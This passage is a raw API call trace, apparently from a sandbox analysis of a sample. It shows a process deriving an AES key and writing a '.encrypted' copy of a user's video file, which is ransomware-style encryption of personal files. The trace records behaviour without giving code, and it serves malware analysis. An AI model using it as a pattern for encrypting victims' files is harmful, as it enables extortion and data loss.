HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.817] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.817] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.817] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.817] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.818] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0xfab68a0, ftLastWriteTime.dwHighDateTime=0x1d5c086, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0x7c2100 [0043.818] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.818] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.818] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.819] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.819] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.819] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.820] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.820] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.820] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.820] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.820] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0043.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.821] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\q6ltnsyyx sfrju.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.821] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.821] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.823] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\q6ltnsyyx sfrju.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 